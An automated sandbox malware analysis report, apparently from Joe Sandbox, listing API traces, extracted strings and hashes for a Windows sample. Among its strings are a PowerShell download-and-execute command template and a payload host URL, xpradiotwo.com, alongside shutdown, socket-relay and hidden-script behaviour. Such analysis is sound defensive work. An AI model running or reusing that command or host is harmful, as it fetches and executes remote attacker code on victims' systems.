      control_flow_graph 387 5a7d40-5a7d95 wsprintfA GetTickCount64 call 5a2600 390 5a7d98-5a7db9 call 5a6690 387->390 393 5a7dbb-5a7dcb Sleep 390->393 394 5a7dcd-5a7ddb lstrcmpA 390->394 393->390 395 5a7dee-5a7e18 call 5a6440 * 2 call 5a6280 394->395 396 5a7ddd-5a7dec call 5a8f20 call 5a5600 394->396 407 5a829b-5a82b9 GetTickCount64 395->407 408 5a7e1e-5a7e20 395->408 396->390 410 5a82bb 407->410 411 5a82de-5a82fb call 5a5600 Sleep 407->411 408->407 409 5a7e26-5a7e2c 408->409 409->407 412 5a7e32-5a7ea5 call 5a5620 call 5a7430 call 5a2460 call 5a55e0 call 5a5620 call 5a6440 call 5a2600 call 5a7410 StrToIntA 409->412 414 5a82bd-5a82bf 410->414 415 5a82c1-5a82db call 5a2600 call 5a7410 410->415 411->390 437 5a7eab 412->437 438 5a8291-5a8299 call 5a5600 412->438 414->411 414->415 415->411 440 5a7eb2-5a7ec6 call 5a6440 * 2 437->440 441 5a8273-5a827a call 5a6200 437->441 438->411 440->438 450 5a7ecc-5a7ece 440->450 441->438 448 5a827c-5a828b InitiateSystemShutdownExW 441->448 448->438 450->438 451 5a7ed4-5a7efd StrToIntA call 5a6280 call 5a55e0 450->451 451->438 456 5a7f03-5a7f09 451->456 457 5a7f0b-5a7f4d GetSystemDirectoryW PathCombineW wnsprintfW 456->457 458 5a7f4f-5a7f52 456->458 459 5a7fa4-5a7feb GetModuleHandleA GetProcAddress * 2 457->459 458->459 460 5a7f54-5a7f6d call 5a6280 call 5a2740 458->460 461 5a7fed-5a7ff0 459->461 462 5a7ff3-5a7ff7 459->462 460->459 475 5a7f6f-5a7f9f ExpandEnvironmentStringsW wnsprintfW call 5a5600 460->475 461->462 464 5a7ff9-5a800e call 5a56d0 462->464 465 5a8031-5a8055 LoadLibraryA GetProcAddress 462->465 471 5a8059-5a805e 464->471 474 5a8010-5a802f call 5a6280 call 5a2630 call 5a5600 464->474 465->471 472 5a8060 471->472 473 5a8065-5a8077 call 5a55e0 471->473 472->473 481 5a8118-5a812f call 5a5600 * 3 473->481 482 5a807d-5a8102 call 5a8ec0 call 5a7430 wsprintfA wnsprintfA call 5a2460 call 5a6690 473->482 474->471 475->459 481->411 501 5a810b-5a8115 call 5a5600 482->501 502 5a8104-5a8106 call 5a5600 482->502 501->481 502->501
      APIs
      • wsprintfA.USER32 ref: 005A7D66
      • GetTickCount64.KERNEL32 ref: 005A7D74
        • Part of subcall function 005A6690: ObtainUserAgentString.URLMON(00000000,?,?), ref: 005A66B2
        • Part of subcall function 005A6690: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005A66D2
        • Part of subcall function 005A6690: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005A6738
        • Part of subcall function 005A6690: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005A6771
        • Part of subcall function 005A6690: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005A678E
        • Part of subcall function 005A6690: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005A67C7
        • Part of subcall function 005A6690: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005A67F0
      • Sleep.KERNEL32(00000000), ref: 005A7DC6
      • lstrcmpA.KERNEL32(00000000,INIT), ref: 005A7DD3
      • StrToIntA.SHLWAPI(00000000), ref: 005A7E96
      • StrToIntA.SHLWAPI(00000000), ref: 005A7EDB
      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005A7F17
      • PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 005A7F30
      • wnsprintfW.SHLWAPI ref: 005A7F44
      • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005A7F80
      • wnsprintfW.SHLWAPI ref: 005A7F94
        • Part of subcall function 005A5600: GetProcessHeap.KERNEL32(00000000,00000000,005A82E5), ref: 005A5607
        • Part of subcall function 005A5600: HeapFree.KERNEL32(00000000), ref: 005A560E
      • GetModuleHandleA.KERNEL32(kernel32), ref: 005A7FB7
      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005A7FC5
      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005A7FDA
      • LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 005A803B
      • GetProcAddress.KERNEL32(00000000), ref: 005A8042
      • wsprintfA.USER32 ref: 005A80A2
      • wnsprintfA.SHLWAPI ref: 005A80CE
        • Part of subcall function 005A2740: GetProcessHeap.KERNEL32(00000008,?), ref: 005A2752
        • Part of subcall function 005A2740: HeapAlloc.KERNEL32(00000000), ref: 005A2759
      • Sleep.KERNEL32(00000000), ref: 005A82F6
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
      • String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
      • API String ID: 1920831074-1153165106
      • Opcode ID: 4e2ce8315e3fbf54cf3992cb71974383dd7cd87cca690a26ac895320d841959e
      • Instruction ID: 3d9fc9236611e804888e121891d219ade99241fd1ab892901109a514c7eeb501
      • Opcode Fuzzy Hash: 4e2ce8315e3fbf54cf3992cb71974383dd7cd87cca690a26ac895320d841959e
      • Instruction Fuzzy Hash: F2C1B371E00609ABDB14EBB4CC8DBBE7FB5BF8A300F504529E516A7291EB745E04CB90
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
        • Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080
        • Part of subcall function 00FB26F0: operator!=.LIBCPMTD ref: 00FB27B9
        • Part of subcall function 00FB26F0: task.LIBCPMTD ref: 00FB27CA
        • Part of subcall function 00FB26F0: task.LIBCPMTD ref: 00FB27D9
        • Part of subcall function 00FB2870: task.LIBCPMTD ref: 00FB2889
        • Part of subcall function 00FB2A60: task.LIBCPMTD ref: 00FB2AB3
        • Part of subcall function 00FB2A60: task.LIBCPMTD ref: 00FB2AC2
      • task.LIBCPMTD ref: 00FB2C96
        • Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB24E6
        • Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB24F2
        • Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB24FE
        • Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB250A
        • Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB2519
        • Part of subcall function 00FB1BD0: task.LIBCPMTD ref: 00FB1C63
        • Part of subcall function 00FB1BD0: task.LIBCPMTD ref: 00FB1C72
        • Part of subcall function 00FB1D30: operator!=.LIBCPMTD ref: 00FB1DB9
        • Part of subcall function 00FB1D30: task.LIBCPMTD ref: 00FB1DC7
        • Part of subcall function 00FB1D30: task.LIBCPMTD ref: 00FB1DD6
        • Part of subcall function 00FB1E90: task.LIBCPMTD ref: 00FB1F50
        • Part of subcall function 00FB1E90: task.LIBCPMTD ref: 00FB1F5F
        • Part of subcall function 00FB1FF0: task.LIBCPMTD ref: 00FB204A
        • Part of subcall function 00FB1FF0: task.LIBCPMTD ref: 00FB2056
        • Part of subcall function 00FB1FF0: task.LIBCPMTD ref: 00FB2065
        • Part of subcall function 00FB2090: task.LIBCPMTD ref: 00FB20E6
      • task.LIBCPMTD ref: 00FB2E58
      • task.LIBCPMTD ref: 00FB2EFC
        • Part of subcall function 00FB21A0: operator!=.LIBCPMTD ref: 00FB2294
        • Part of subcall function 00FB21A0: task.LIBCPMTD ref: 00FB22A5
        • Part of subcall function 00FB21A0: task.LIBCPMTD ref: 00FB22B4
      Strings
      • bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg, xrefs: 00FB2CFB
      • syntqwezljesnhnfjaztdeotfzpejojodftab, xrefs: 00FB2EB0
      • rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb, xrefs: 00FB2C52
      • cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho, xrefs: 00FB2E11
      • brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis, xrefs: 00FB2E7E
      • rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo, xrefs: 00FB2DE8
      • sqfyhcibiyaixyvseuhuztdlx, xrefs: 00FB2C6B
      • ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund, xrefs: 00FB2C12
      • yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy, xrefs: 00FB2E36
      • jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu, xrefs: 00FB2D8A
      • upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs, xrefs: 00FB2B5E
      • gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj, xrefs: 00FB2ECF
      • fuisqwdbksjnkwghhwh, xrefs: 00FB2CC8
      • nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs, xrefs: 00FB2DA3
      • shtumcttjzvhu, xrefs: 00FB2E65
      • jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd, xrefs: 00FB2E97
      • gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa, xrefs: 00FB2D71
      • bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs, xrefs: 00FB2BAF
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$operator!=$char_traits
      • String ID: bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg$bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs$brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis$ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund$cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho$fuisqwdbksjnkwghhwh$gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj$gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa$jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu$jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd$nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs$rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb$rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo$shtumcttjzvhu$sqfyhcibiyaixyvseuhuztdlx$syntqwezljesnhnfjaztdeotfzpejojodftab$upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs$yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy
      • API String ID: 1022754510-231213261
      • Opcode ID: 6b9f6607a455126810d3cad92ef0a42ff81ce3c2c9a0ddb691ed4f5713c08134
      • Instruction ID: 276138f7133502140896add050595ba2a440454092404297de499a6267daff77
      • Opcode Fuzzy Hash: 6b9f6607a455126810d3cad92ef0a42ff81ce3c2c9a0ddb691ed4f5713c08134
      • Instruction Fuzzy Hash: C6B18170E547089ACB00FF79CE17B9EBB71AF46B44F40025DE4417B2C1EB755A44AB92
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traitsoperator!=
      • String ID: -$P$[$ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
      • API String ID: 2802545854-2318821752
      • Opcode ID: 26e070bf21d521db06a0a0c3a58cfdcb746a381ee6c385c9830e20b70ce2eb5c
      • Instruction ID: 4e056cfc3fe9184dcf42e47b6dc19e42f045a71391f50e9831e380093c844626
      • Opcode Fuzzy Hash: 26e070bf21d521db06a0a0c3a58cfdcb746a381ee6c385c9830e20b70ce2eb5c
      • Instruction Fuzzy Hash: 5E714A70D04258CEDB64EFA5CD56BEDBBB0AF04704F14819DD049A7282DB785B88EF51
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005A8541
      • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005A8554
      • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005A8567
      • GetFileAttributesW.KERNEL32(?), ref: 005A858D
      • GetFileAttributesW.KERNEL32(?), ref: 005A85A6
      • lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005A85BD
      • wnsprintfW.SHLWAPI ref: 005A85E0
      • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005A8602
      Strings
      • %SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 005A853C
      • open, xrefs: 005A85FB
      • sd4.ps1, xrefs: 005A85B1
      • https://xpradiotwo.com/wp-content/uploads, xrefs: 005A85CA
      • %ComSpec%, xrefs: 005A8562
      • %SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 005A854F
      • /c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 005A85CF
      • sd2.ps1, xrefs: 005A8598
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
      • String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://xpradiotwo.com/wp-content/uploads$open$sd2.ps1$sd4.ps1
      • API String ID: 4132772799-2303719311
      • Opcode ID: f882ce59608c18cb06792e674cb1e3976ab75f3ffef4a9676358cd8c0bfd10bd
      • Instruction ID: 11015f55b30dec0c5522288284306791d8d3d9a8b9e74ec62365a989a77d8a67
      • Opcode Fuzzy Hash: f882ce59608c18cb06792e674cb1e3976ab75f3ffef4a9676358cd8c0bfd10bd
      • Instruction Fuzzy Hash: EA219671D4062C6AEB10D7A4CC45FFE7FACBB1A714F040591AA58E20D1DBB05A898FD1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 005A5703
      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5761
      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5774
      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5779
      • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5790
      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A57A7
      • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A57E4
      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A580F
      • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5812
      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A581D
      • HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5820
      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5877
      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5893
      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005A5898
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
      • String ID: D
      • API String ID: 2337985897-2746444292
      • Opcode ID: adae26e5ee95b7e3b226b8a2f4b28cf2ace2535028b538dff95281fe26f4bf6f
      • Instruction ID: 0dccf0c17a489151dedc127051fc0d81582416a24bca1dae9aa1cd686773ec2d
      • Opcode Fuzzy Hash: adae26e5ee95b7e3b226b8a2f4b28cf2ace2535028b538dff95281fe26f4bf6f
      • Instruction Fuzzy Hash: C051B371A00219AFEB208FA5DC48FAF7FB9FF45744F244469E915F7291EB7498048BA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • inet_pton.WS2_32(00000002,?,?), ref: 005A62C0
      • htons.WS2_32(?), ref: 005A62DC
      • inet_pton.WS2_32(00000002,?,?), ref: 005A62EE
      • htons.WS2_32(?), ref: 005A62F5
      • socket.WS2_32(00000002,00000001,00000006), ref: 005A6308
      • connect.WS2_32(00000000,?,00000010), ref: 005A6323
      • socket.WS2_32(00000002,00000001,00000006), ref: 005A6334
      • connect.WS2_32(00000000,?,00000010), ref: 005A6349
      • select.WS2_32(00000000,?), ref: 005A6371
      • recv.WS2_32(?,?,00000400,00000000), ref: 005A63A4
      • send.WS2_32(00000000,?,00000000,00000000), ref: 005A63CA
      • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 005A63FC
      • closesocket.WS2_32(00000000), ref: 005A6412
      • closesocket.WS2_32(00000000), ref: 005A6419
      • GetProcessHeap.KERNEL32(00000000,?), ref: 005A6424
      • HeapFree.KERNEL32(00000000), ref: 005A642B
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heapclosesocketconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
      • String ID:
      • API String ID: 1922096520-0
      • Opcode ID: 231102c69fd58942bba2cdb53f3977499aaa63760eb6f8aa0886e99098fce032
      • Instruction ID: b5cb10f600d96072948abd713a44e627fe1d0b9652b8c85a0e66b4f1d44b6fe8
      • Opcode Fuzzy Hash: 231102c69fd58942bba2cdb53f3977499aaa63760eb6f8aa0886e99098fce032
      • Instruction Fuzzy Hash: 44418D71104304ABE7109F649C89B6EBBE8FF9A710F14091EF655D71E1D3B0E8498BA2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • inet_pton.WS2_32(00000002,?,?), ref: 005A72A3
      • htons.WS2_32(?), ref: 005A72AE
      • socket.WS2_32(00000002,00000001,00000006), ref: 005A72C6
      • connect.WS2_32(00000000,?,00000010), ref: 005A72E4
      • recv.WS2_32(00000000,?,00000002,00000000), ref: 005A72FC
      • GetProcessHeap.KERNEL32(00000008,00000024), ref: 005A731D
      • HeapAlloc.KERNEL32(00000000), ref: 005A7320
      • CreateThread.KERNEL32(00000000,00000000,Function_000062A0,00000000,00000000,00000000), ref: 005A739B
      • CloseHandle.KERNEL32(00000000), ref: 005A73A6
      • recv.WS2_32(00000000,?,00000002,00000000), ref: 005A73BE
      • closesocket.WS2_32(00000000), ref: 005A73CD
      • GetProcessHeap.KERNEL32(00000000,?), ref: 005A73D6
      • HeapFree.KERNEL32(00000000), ref: 005A73D9
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A73F3
      • HeapFree.KERNEL32(00000000), ref: 005A73F6
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
      • String ID:
      • API String ID: 2784442062-0
      • Opcode ID: 5a7cc7d9c1116afc99ba1faf57d5e701ea825e8511c32a884bacc1a8773e00e9
      • Instruction ID: 15d38eaa2f93ebcfd0c5d16110f886c14ff5a2fa9593291289682697fb4cbce7
      • Opcode Fuzzy Hash: 5a7cc7d9c1116afc99ba1faf57d5e701ea825e8511c32a884bacc1a8773e00e9
      • Instruction Fuzzy Hash: 7241E474A0534AABEB204B759C49B6F7F78BF1B701F14485AFE02DA182D3709845E7E4
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      • gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb, xrefs: 00FB1EDD
      • fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv, xrefs: 00FB1EF6
      • hcndlsldtwhpkrlbisuiflvfeofcd, xrefs: 00FB1EC5, 00FB1F07, 00FB1F24
      • `, xrefs: 00FB1F6C
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traits
      • String ID: `$fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv$gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb$hcndlsldtwhpkrlbisuiflvfeofcd
      • API String ID: 1455298312-2158094500
      • Opcode ID: fa04a69e73dd004fa707f5cf57d765a3b9aa9789da73ecebecc0671c2b75c3ff
      • Instruction ID: 4ae3430607fdf17edbbc8bdc5c0f0edba41006d76a0ca7ab37636daef99852ee
      • Opcode Fuzzy Hash: fa04a69e73dd004fa707f5cf57d765a3b9aa9789da73ecebecc0671c2b75c3ff
      • Instruction Fuzzy Hash: 03412A3094438CDADB04EFA5CD66BEDBBB4AF11708F50419DE0056B282DB795B48EF51
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 005A7181
      • lstrlenW.KERNEL32(?), ref: 005A718A
      • ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 005A71A5
      • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 005A71B3
      • GetLastError.KERNEL32 ref: 005A71BD
      • ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 005A71D4
      • wnsprintfW.SHLWAPI ref: 005A71EE
      • SetFileAttributesW.KERNEL32(?,00000006), ref: 005A720E
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: EnvironmentExpandStrings$AttributesDirectoryErrorFileLastSystemWow64lstrlenwnsprintf
      • String ID: "%s"$%ProgramData%\agent.js$%ProgramFiles%$%ProgramW6432%
      • API String ID: 457462216-4115850629
      • Opcode ID: 2a2108295a634b8b56a274028851ea824fb6a5b41d640c17b24dd3d25d2f3888
      • Instruction ID: 00ece9c7b2f0f734ff5fafe9c2277ee1479c9bc1372e3f36f00e18959adb9d65
      • Opcode Fuzzy Hash: 2a2108295a634b8b56a274028851ea824fb6a5b41d640c17b24dd3d25d2f3888
      • Instruction Fuzzy Hash: 3411D6B5E4031C6BE710D790AC49EDE7BACAB59744F4400A1A755D2091EBB05A88CFD5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ___free_lconv_mon.LIBCMT ref: 00FBA108
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C4C
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C5E
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C70
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C82
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9C94
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CA6
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CB8
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CCA
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CDC
